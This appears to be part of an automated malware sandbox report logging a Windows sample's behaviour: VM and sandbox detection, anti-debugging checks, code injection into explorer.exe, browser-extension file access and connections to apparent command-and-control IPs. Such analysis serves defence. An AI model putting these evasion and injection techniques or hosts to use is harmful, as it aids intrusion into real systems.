Source: C:\Users\user\Desktop\veEGy9FijY.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\haevsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\haevsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\haevsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\haevsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\haevsid	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_15-882

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\38E5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\veEGy9FijY.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\veEGy9FijY.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\haevsid	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\haevsid	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\uievsid	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\uievsid	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: uievsid, 00000009.00000002.2754391741.000000000069E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKI
Source: haevsid, 00000005.00000002.1970692682.000000000272E000.00000004.00000020.00020000.00000000.sdmp, 38E5.exe, 00000007.00000002.2487448009.000000000082E000.00000004.00000020.00020000.00000000.sdmp, haevsid, 00000022.00000002.3707612845.00000000027C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: veEGy9FijY.exe, 00000000.00000002.1737243592.000000000275E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKA

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 15_2_00B41016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,

15_2_00B41016

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 420	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1094	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 805	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 379	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3425	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 905	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 850	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 2504	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2061	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 3660	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3567

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_10-4476

Source: C:\Windows\explorer.exe TID: 6900	Thread sleep count: 420 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6924	Thread sleep count: 1094 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6924	Thread sleep time: -109400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6896	Thread sleep count: 805 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6896	Thread sleep time: -80500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6348	Thread sleep count: 297 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6420	Thread sleep count: 379 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6420	Thread sleep time: -37900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6272	Thread sleep count: 339 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6272	Thread sleep time: -33900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6924	Thread sleep count: 3425 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6924	Thread sleep time: -342500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2516	Thread sleep count: 2504 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2516	Thread sleep time: -2504000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3352	Thread sleep count: 2061 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3352	Thread sleep time: -2061000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 4280	Thread sleep count: 3660 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 4280	Thread sleep time: -3660000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2176	Thread sleep count: 3567 > 30
Source: C:\Windows\explorer.exe TID: 2176	Thread sleep time: -3567000s >= -30000s

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Code function: 10_2_00007FF6AAB4FB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,	10_2_00007FF6AAB4FB4C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E02B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	13_2_00E02B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E01D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	13_2_00E01D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E03ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	13_2_00E03ED9
Source: C:\Windows\explorer.exe	Code function: 14_2_001D30A8 FindFirstFileW,FindNextFileW,FindClose,	14_2_001D30A8

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 13_2_00E06512 GetSystemInfo,

13_2_00E06512

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: explorer.exe, 00000001.00000000.1726737845.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1726201886.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1726201886.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1726737845.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1722570425.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1726737845.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1726201886.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2910898340.0000000003578000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000D.00000002.2910898340.0000000003558000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW zX
Source: BC8F.exe, 0000000A.00000002.4140670526.0000020326C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fo & echo 1029732313311351031029732313\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77104-AAOEM\r\nOriginal Install Date: 03/10/2023, 09:57:18\r\nSystem Boot Time: 24/09/2023, 13:00:03\r\nSystem Manufacturer: nk4AVBRUTsuPtvZ\r\nSystem Model: OSCwbcDf\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: ZS6MC RA31Y, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'850 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'114 MB\r\nVirtual Memory: In Use: 1'077 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: ncU69\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.4\r\n [02]: fe80::29b9:a951:1791:4eb3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n1029732313311351031029732313\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>AhLewOCEgkiOocFnIHMtkWqsfmQgkIXKWToQTXwVRDBzHhOPCWFbvoAByIeTjtDma\CGowyuvjVXoVkgbh.exe,5812
Source: explorer.exe, 00000001.00000000.1726737845.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1724600105.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: BC8F.exe, 0000000A.00000002.4139823391.0000020326C18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000001.00000000.1722570425.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1726201886.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: ROUTE.EXE, 00000026.00000002.3633007494.00000237F7469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000001.00000000.1722570425.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000002.2910898340.0000000003578000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWD

Source: C:\Users\user\Desktop\veEGy9FijY.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\veEGy9FijY.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\veEGy9FijY.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	System information queried: CodeIntegrityInformation

Source: C:\Users\user\Desktop\veEGy9FijY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Process queried: DebugPort

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 15_2_00B41B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,

15_2_00B41B17

Source: C:\Windows\SysWOW64\explorer.exe

15_2_00B41016

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe

10_2_00007FF6AAB43220

Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_025B092B mov eax, dword ptr fs:[00000030h]	0_2_025B092B
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_025B0D90 mov eax, dword ptr fs:[00000030h]	0_2_025B0D90
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_0277F6DE push dword ptr fs:[00000030h]	0_2_0277F6DE
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_025B092B mov eax, dword ptr fs:[00000030h]	5_2_025B092B
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_025B0D90 mov eax, dword ptr fs:[00000030h]	5_2_025B0D90
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_0274EB16 push dword ptr fs:[00000030h]	5_2_0274EB16
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_0061092B mov eax, dword ptr fs:[00000030h]	7_2_0061092B
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00610D90 mov eax, dword ptr fs:[00000030h]	7_2_00610D90
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_008504D3 push dword ptr fs:[00000030h]	7_2_008504D3
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_005D092B mov eax, dword ptr fs:[00000030h]	9_2_005D092B
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_005D0D90 mov eax, dword ptr fs:[00000030h]	9_2_005D0D90
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_006C0093 push dword ptr fs:[00000030h]	9_2_006C0093

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe

Code function: 10_2_00007FF6AAB425B4 GetProcessHeap,RtlFreeHeap,

10_2_00007FF6AAB425B4

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 38E5.exe.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.175.29.39 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 58.151.148.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.145.40.162 443	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\veEGy9FijY.exe	Thread created: C:\Windows\explorer.exe EIP: 13919A8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Thread created: unknown EIP: 33C19A8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Thread created: unknown EIP: 31D1970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Thread created: unknown EIP: 8D81970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Thread created: unknown EIP: 8B719A8

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 6072 base: FF79C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 4116 base: 7FF72B812D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 6112 base: FF79C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 412 base: 7FF72B812D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1340 base: FF79C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1784 base: 7FF72B812D10 value: 90	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\veEGy9FijY.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uievsid	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\haevsid	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\haevsid	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read

Writes to foreign memory regions

Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: FF79C0	Jump to behavior
